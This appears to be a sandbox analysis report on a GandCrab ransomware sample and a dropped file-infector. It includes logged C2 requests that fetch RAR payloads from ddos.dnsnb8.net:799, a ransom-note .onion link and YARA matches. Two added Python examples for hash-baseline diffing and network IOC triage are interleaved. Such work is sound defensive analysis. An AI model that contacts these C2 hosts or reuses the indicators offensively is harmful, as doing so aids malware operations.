Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Code function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
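The "System file mapped for write" entries above show the dropped vSQshX.exe opening executables under Program Files for writing, which is what the "Infects executable files" signature is keyed on. A responder's counterpart is a hash baseline over those directories and a diff after the incident. The following is an added example, not Joe Sandbox code or the report's own tooling; it builds a throwaway directory tree with constructed file contents, so the paths it reports (Office16/VPREVIEW.EXE, MyProg.exe) are only modelled on the report's entries.

```python
"""Baseline-and-diff check for executables under a program directory.
Added example, not Joe Sandbox code. demo() constructs its own temporary
tree, so every path and hash it reports is synthetic."""
import hashlib
import json
import os
import tempfile
from pathlib import Path

# The file types named by the report's "Infects executable files" signature.
EXE_SUFFIXES = {".exe", ".dll", ".sys"}


def sha256_file(path, chunk=1 << 16):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> sha256 for every executable-type file under root."""
    root = Path(root)
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in EXE_SUFFIXES
    }


def save_baseline(baseline, path):
    Path(path).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def diff_baseline(root, baseline):
    """Compare the tree under root against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Constructed scenario: baseline a fake Program Files tree, then tamper with it
    the way an infector would (overwrite an existing EXE, drop a new one)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "Office16").mkdir()
        (root / "Office16" / "VPREVIEW.EXE").write_bytes(b"MZ" + b"\0" * 64)
        (root / "readme.txt").write_bytes(b"not an executable, never baselined")
        save_baseline(build_baseline(root), root / "baseline.json")
        baseline = load_baseline(root / "baseline.json")
        with open(root / "Office16" / "VPREVIEW.EXE", "ab") as f:
            f.write(b"APPENDED PAYLOAD")          # simulated infection
        (root / "MyProg.exe").write_bytes(b"MZ" + b"\0" * 16)  # simulated drop
        return diff_baseline(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

A baseline only helps if it was taken before the dropper ran, and for signed vendor binaries a failed Authenticode check is a stronger signal than a hash mismatch, since updates also change hashes; this example keeps to the hash diff because that is all the report's evidence supports.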

Networking

Source: Traffic | Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.4:58565 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49707 -> 63.251.106.25:799
Source: Traffic | Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49708 -> 63.251.106.25:799
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
Source: SY5DeZW6pz.exe, 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe, 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 799
Source: Joe Sandbox View | ASN Name: VOXEL-DOT-NETUS
Source: Joe Sandbox View | IP Address: 63.251.106.25
Source: global traffic | HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cj//k2.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.4:49707 -> 63.251.106.25:799
Source: vSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/&
Source: vSQshX.exe, 00000001.00000000.334129715.00000000030C9000.00000004.00000010.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
Source: vSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar%
Source: SY5DeZW6pz.exe | String found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: Amcache.hve.1.dr | String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.activestate.comJames
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/scite
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.baanboard.comPraveen
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.develop.comYann
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.rftp.comSteve
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.scintila.org/scite.rng
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.spaceblue.comDenis
Source: SY5DeZW6pz.exe | String found in binary or memory: https://tox.chat/download.html
Source: SY5DeZW6pz.exe | String found in binary or memory: https://www.torproject.org/
Source: unknown | DNS traffic detected: queries for: ddos.dnsnb8.net
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F397EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,
Source: global traffic | HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cj//k2.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: SY5DeZW6pz.exe, 00000000.00000000.323985361.000000000178A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: SciTE.exe.1.dr | Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \
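The Networking evidence combines two things a triage script can pull out mechanically: plain HTTP to a port where HTTP is not expected (the k1.rar/k2.rar fetches to ddos.dnsnb8.net:799, which is also what the "non-standard ports" signature fires on) and a Tor .onion address embedded in the GandCrab ransom note. The following is an added example, not Joe Sandbox code; the request lines and strings it works on are constructed to mirror the entries above, and EXPECTED_HTTP_PORTS and REFERENCE_HOSTS are this example's own assumptions about which ports count as normal and which hosts are ransom-note references rather than infrastructure.

```python
"""Network triage over sandbox output: flag HTTP to non-standard ports and
extract .onion / C2 hosts from dumped strings. Added example, not Joe Sandbox
code; SAMPLE_REQUESTS and SAMPLE_STRINGS are constructed inputs."""
import re
from urllib.parse import urlsplit

# Assumptions for this example, not taken from the report.
EXPECTED_HTTP_PORTS = {80, 443, 8000, 8080, 8443}
REFERENCE_HOSTS = {"www.torproject.org", "tox.chat"}   # victim instructions, not C2

HOST_RE = re.compile(r"\bHost:\s*(\S+)")
ONION_RE = re.compile(r"\b([a-z2-7]{56}|[a-z2-7]{16})\.onion\b", re.IGNORECASE)  # v3 | v2
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed: requests the way the sandbox prints them (headers on one line).
SAMPLE_REQUESTS = [
    "GET /cj//k1.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate "
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0) "
    "Host: ddos.dnsnb8.net:799 Connection: Keep-Alive",
    "GET /index.html HTTP/1.1 Accept: */* Host: www.example.com Connection: Keep-Alive",
    "POST /api/v1 HTTP/1.1 Host: 10.0.0.5:8443 Connection: close",
]
# Constructed: strings of the kind found in the binary and memory dumps.
SAMPLE_STRINGS = [
    "4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b",
    "http://ddos.dnsnb8.net:799/cj//k2.rar",
    "https://www.torproject.org/",
    "http://%s:%d/%s/%s",   # printf template, no concrete host: must be ignored
]


def split_host_port(host_header, default_port=80):
    """Split a Host header value into (hostname, port); handles [v6]:port."""
    parts = urlsplit("//" + host_header)
    return parts.hostname, parts.port if parts.port is not None else default_port


def flag_odd_port_http(request_line):
    """Return {'host','port','path'} when HTTP goes to a port outside EXPECTED_HTTP_PORTS."""
    m = HOST_RE.search(request_line)
    if not m:
        return None
    try:
        host, port = split_host_port(m.group(1))
    except ValueError:          # malformed port in Host header
        return None
    if host is None or port in EXPECTED_HTTP_PORTS:
        return None
    tokens = request_line.split(" ", 2)
    path = tokens[1] if len(tokens) == 3 and tokens[2].startswith("HTTP/") else ""
    return {"host": host, "port": port, "path": path}


def extract_network_iocs(strings):
    """Collect .onion addresses, contacted hosts and URLs from dumped strings."""
    iocs = {"onion": set(), "hosts": set(), "urls": set(), "references": set()}
    for s in strings:
        for m in ONION_RE.finditer(s):
            iocs["onion"].add(m.group(0).lower())
        for url in URL_RE.findall(s):
            u = urlsplit(url)
            host = (u.hostname or "").lower()
            try:
                port = u.port
            except ValueError:      # e.g. "http://%s:%d/..." format strings
                continue
            if not host or "%" in host or "." not in host:
                continue
            if host in REFERENCE_HOSTS:
                iocs["references"].add(host)
                continue
            iocs["urls"].add(url)
            iocs["hosts"].add(host if port is None else f"{host}:{port}")
    return iocs


def triage(requests, strings):
    beacons = [b for b in (flag_odd_port_http(r) for r in requests) if b]
    return {"odd_port_http": beacons, **extract_network_iocs(strings)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REQUESTS, SAMPLE_STRINGS).items():
        print(f"{key}: {sorted(map(str, value))}")
```

The port allowlist is the weak point of this heuristic: proxies and web-admin ports vary per environment, so treat a hit as a pivot into the PCAP rather than a verdict. The host allowlist exists because ransom notes routinely cite torproject.org and tox.chat, and blocking those tells a responder nothing about the actor's infrastructure.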

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: SY5DeZW6pz.exe, type: SAMPLE
Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,

System Summary

Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY | Matched rule: Gandcrab Payload Author: kevoreilly
Source: vSQshX.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SY5DeZW6pz.exe | Static PE information: section name: |Zu8
Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
Source: SY5DeZW6pz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: SY5DeZW6pz.exe, type: SAMPLE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
